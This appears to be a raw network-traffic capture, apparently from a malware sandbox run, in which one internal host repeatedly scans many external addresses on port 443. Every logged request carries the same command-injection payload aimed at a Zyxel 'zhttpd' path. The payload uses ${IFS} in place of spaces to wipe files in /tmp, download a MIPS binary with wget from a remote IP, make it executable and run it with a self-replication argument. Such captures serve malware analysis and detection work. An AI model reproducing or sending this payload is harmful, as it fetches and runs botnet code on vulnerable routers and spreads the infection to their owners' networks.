                                          Jan 14, 2024 15:46:18.037467957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4768192.168.2.2350622175.236.68.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037537098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4769192.168.2.23451222.115.112.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037575960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4770192.168.2.234260235.117.68.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037604094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4771192.168.2.235214861.249.75.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037664890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4772192.168.2.2343378221.252.211.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037697077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4773192.168.2.235601294.194.33.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037727118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4774192.168.2.2339304131.26.108.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037753105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4775192.168.2.234766692.65.178.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037786961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4776192.168.2.2359706196.93.245.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037827969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4777192.168.2.2345812166.31.40.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037874937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4778192.168.2.235159294.251.78.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037915945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4779192.168.2.235639639.197.10.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037947893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4780192.168.2.2355510208.125.219.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037976980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4781192.168.2.2356370221.187.94.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038036108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4782192.168.2.2336068188.222.11.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038074017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4783192.168.2.2355404220.227.14.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038103104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4784192.168.2.2340100160.50.120.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038141012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4785192.168.2.2341838175.99.129.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038207054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4786192.168.2.2346004208.179.65.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038242102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4787192.168.2.235417692.129.206.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038280964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4788192.168.2.2351124188.34.109.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038309097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4789192.168.2.233571023.69.200.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038352013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4790192.168.2.2349890129.243.169.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038399935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4791192.168.2.23535485.249.124.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038415909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4792192.168.2.2353280101.30.208.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038460970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4793192.168.2.2342762159.160.10.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038496017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4794192.168.2.2348508194.8.239.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038532019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4795192.168.2.2353314166.121.223.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038592100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4796192.168.2.2352412175.182.45.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038642883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4797192.168.2.235132849.251.41.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038669109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4798192.168.2.2340756154.186.216.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038701057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4799192.168.2.2336526149.110.198.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038743019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4800192.168.2.2351006175.129.252.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038775921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4801192.168.2.2353582163.106.41.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038789988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4802192.168.2.233519657.10.59.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038849115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4803192.168.2.2360076218.228.76.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038923979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4804192.168.2.2340682199.180.238.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.038959026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4805192.168.2.2351986110.156.224.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039001942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4806192.168.2.235614217.45.248.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039067030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4807192.168.2.234012290.118.109.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039093018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4808192.168.2.2334040140.166.241.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039139032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4809192.168.2.2343870189.212.77.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039211988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4810192.168.2.2360206223.100.122.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039230108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4811192.168.2.234608212.149.47.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039247036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4812192.168.2.235905053.206.91.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039313078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4813192.168.2.2358892156.248.238.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039369106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4814192.168.2.2357088107.203.226.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039412022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4815192.168.2.2344020125.172.55.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039473057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4816192.168.2.2360060101.103.222.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039515972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4817192.168.2.233374864.175.244.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039565086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4818192.168.2.2336122196.160.115.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039606094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4819192.168.2.236039445.98.0.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039695024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4820192.168.2.2341526106.232.37.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039711952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4821192.168.2.2349786192.53.193.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039784908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4822192.168.2.2354802197.170.42.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039797068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4823192.168.2.2341670157.75.118.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039865017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4824192.168.2.2360136197.21.101.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039896011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4825192.168.2.234111052.77.163.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039927959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4826192.168.2.235545460.145.56.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.039985895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4827192.168.2.2353820176.209.104.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040015936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4828192.168.2.234940244.85.86.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040029049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4829192.168.2.2335838191.211.143.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040080070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4830192.168.2.2358744154.50.67.251443
                                          TimestampBytes transferredDirectionData
